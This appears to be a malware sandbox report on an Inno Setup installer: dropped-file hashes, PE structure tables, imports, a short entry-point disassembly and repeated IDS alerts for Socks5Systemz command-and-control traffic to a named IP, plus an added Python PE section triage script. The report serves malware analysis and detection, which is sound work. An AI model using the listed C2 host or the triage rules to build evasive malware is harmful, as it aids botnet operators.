                                                                            SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                            MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                            SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                            SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                            SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.999404759097388
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:6hvZpn91O8.exe
                                                                            File size:7'246'011 bytes
                                                                            MD5:1015b0b5cfddfbc4baea6910d9c56c3c
                                                                            SHA1:9fe1cae9d38a53a1217556c60ffd3c02d8235d66
                                                                            SHA256:f08f680f17aaf9505a8d53648545ce684af9b39a90a8dc9d2e872693e1d59b45
                                                                            SHA512:536455cbd7a0240bb4608901c168826dadc4609132f07041bf6b4ac295b158f7cdf1be22790ee5776f80bbbc2bf4b4a13431375a7312b8f7afc05a13e22f2ecf
                                                                            SSDEEP:196608:gK2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:gDY6tiP3myRfzepXe4ny8gxzj
                                                                            TLSH:1C763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
                                                                            Icon Hash:2d2e3797b32b2b99
                                                                            Entrypoint:0x409c40
                                                                            Entrypoint Section:CODE
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x65765E5F [Mon Dec 11 00:57:03 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:1
                                                                            OS Version Minor:0
                                                                            File Version Major:1
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:1
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFC4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-10h], eax
                                                                            mov dword ptr [ebp-24h], eax
                                                                            call 00007FD004C4F57Bh
                                                                            call 00007FD004C50782h
                                                                            call 00007FD004C50A11h
                                                                            call 00007FD004C52A48h
                                                                            call 00007FD004C52A8Fh
                                                                            call 00007FD004C553BEh
                                                                            call 00007FD004C55525h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 0040A2FCh
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A2C5h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0040C014h]
                                                                            call 00007FD004C55F8Bh
                                                                            call 00007FD004C55BBEh
                                                                            lea edx, dword ptr [ebp-10h]
                                                                            xor eax, eax
                                                                            call 00007FD004C53078h
                                                                            mov edx, dword ptr [ebp-10h]
                                                                            mov eax, 0040CDE8h
                                                                            call 00007FD004C4F627h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0040CDE8h]
                                                                            mov dl, 01h
                                                                            mov eax, 0040738Ch
                                                                            call 00007FD004C53907h
                                                                            mov dword ptr [0040CDECh], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A27Dh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007FD004C55FFBh
                                                                            mov dword ptr [0040CDF4h], eax
                                                                            mov eax, dword ptr [0040CDF4h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007FD004C5613Ah
                                                                            mov eax, dword ptr [0040CDF4h]
                                                                            mov edx, 00000028h
                                                                            call 00007FD004C53D08h
                                                                            mov edx, dword ptr [000000F4h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9364 | 0x9400 | 0d7ac17dafcd52a9b3ea353c32256c1d | False | 0.6148648648648649 | data | 6.56223225792919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | 45829356498700390b8c7afa10ea05a4 | False | 0.31640625 | data | 2.7585022150416294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 12ab88ff2529942b16e663a514fbedee | False | 0.32262073863636365 | data | 4.461731535554609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
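The section table is the first thing an analyst reads when the signature list says "changes PE section rights" and "PE file has nameless sections". The following is an added example, not code from the Joe Sandbox report: it parses a PE section table from raw bytes with only the Python standard library and applies the usual triage rules (writable+executable, nameless, raw size 0 with a non-zero virtual size, high entropy). The input is a minimal PE image constructed in the block itself; the nameless RWX section in it and the entropy threshold of 7.0 are assumptions for illustration. Note that in this sample BSS, .tls and .reloc have raw size 0 without IMAGE_SCN_CNT_UNINITIALIZED_DATA, so the "virtual-only" rule fires on them; the CODE/DATA/BSS/.idata/.tls/.rdata/.reloc/.rsrc layout is the classic Borland/Delphi linker layout, so that finding is a hint to be read together with the others, not a verdict.

```python
import struct
from collections import Counter
from math import log2

# IMAGE_SCN_* characteristics bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk MZ header -> e_lfanew -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # NumberOfSections, then skip TimeDateStamp/PointerToSymbolTable/NumberOfSymbols,
    # then SizeOfOptionalHeader.
    num_sections, size_opt = struct.unpack_from("<H12xH", pe, coff + 2)
    table = coff + 20 + size_opt            # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars, "entropy": shannon_entropy(raw),
        })
    return sections


def triage(section: dict, entropy_threshold: float = 7.0) -> list:
    """Heuristic hints checked first on a suspicious PE; order is fixed so results compare."""
    c = section["characteristics"]
    findings = []
    if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
        findings.append("writable+executable")        # unpacking / self-modifying code in place
    if not section["name"]:
        findings.append("nameless section")           # common packer artefact
    if (section["raw_size"] == 0 and section["virtual_size"] > 0
            and not c & IMAGE_SCN_CNT_UNINITIALIZED_DATA):
        findings.append("virtual-only (raw size 0)")  # nothing on disk, filled at run time
    if section["entropy"] > entropy_threshold:
        findings.append("high entropy")               # compressed or encrypted content
    return findings


def build_pe(sections, file_align=0x200) -> bytes:
    """Assemble a minimal PE32 image for testing the parser (constructed input, not a real binary)."""
    hdr_len = 0x40 + 4 + 20 + 0xE0 + 40 * len(sections)
    raw_base = -(-hdr_len // file_align) * file_align   # first file-aligned offset after headers
    table, body, va = b"", b"", 0x1000
    for name, vsize, raw, chars in sections:
        padded = raw + b"\0" * (-len(raw) % file_align)
        raw_ptr = raw_base + len(body) if padded else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                             vsize, va, len(padded), raw_ptr, 0, 0, 0, 0, chars)
        body += padded
        va += -(-max(vsize, len(padded)) // 0x1000) * 0x1000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    image = dos + b"PE\0\0" + coff + b"\0" * 0xE0 + table
    return image + b"\0" * (raw_base - len(image)) + body


# Constructed sample: section names and sizes echo the report's table, contents are synthetic.
SAMPLE_PE = build_pe([
    ("CODE", 0x9364, bytes(range(256)) * 4,                     # uniform bytes: entropy 8.0
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    ("BSS", 0xe4c, b"",                                         # raw size 0, like BSS/.tls/.reloc above
     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", 0x2c00, b"\0" * 0x400,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_SHARED | IMAGE_SCN_MEM_READ),
    ("", 0x1000, b"A" * 64,                                     # assumed nameless RWX stub
     IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])


def scan(pe: bytes) -> dict:
    """Map section name -> triage findings for a whole image."""
    return {s["name"]: triage(s) for s in parse_sections(pe)}


if __name__ == "__main__":
    for s in parse_sections(SAMPLE_PE):
        print(f"{s['name'] or '<nameless>':10} vsize=0x{s['virtual_size']:x} "
              f"raw=0x{s['raw_size']:x} entropy={s['entropy']:.2f} {triage(s)}")
```

To run it against the real sample, replace SAMPLE_PE with the bytes of the file; the parser needs no third-party package. The entropy here is computed over SizeOfRawData, which is what the report's Entropy column also measures for the on-disk section.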
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.27483443708609273
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T03:07:57.978929+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:07:57.978929+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:07:58.608004+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:07:58.608004+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49736 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:00.205019+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49737 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:00.205019+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49737 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:01.785416+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49740 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:01.785416+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49740 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:03.392194+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49741 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:03.392194+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49741 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:05.001033+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49747 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:05.001033+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49747 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:06.577197+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49753 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:06.577197+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49753 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.166473+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.166473+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.772181+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:08.772181+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:09.377875+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:09.377875+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:10.951577+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49765 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:10.951577+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49765 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:12.526162+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:12.526162+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:13.123974+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:13.123974+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:14.702136+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49777 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:14.702136+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49777 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:16.282067+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49778 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:16.282067+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49778 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:17.856916+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49784 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:17.856916+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49784 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:19.440462+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49790 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:19.440462+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49790 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.022814+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.022814+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.623810+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:21.623810+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.212063+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.212063+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.811479+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:23.811479+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49798 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:25.393608+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49804 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:25.393608+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49804 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:26.999223+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49809 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:26.999223+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49809 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:28.580571+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:28.580571+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49814 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.164823+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.164823+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.770392+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:30.770392+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49819 | 94.232.249.187 | 80 | TCP
2024-12-14T03:08:32.348769+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49825 | 94.232.249.187 | 80 | TCP
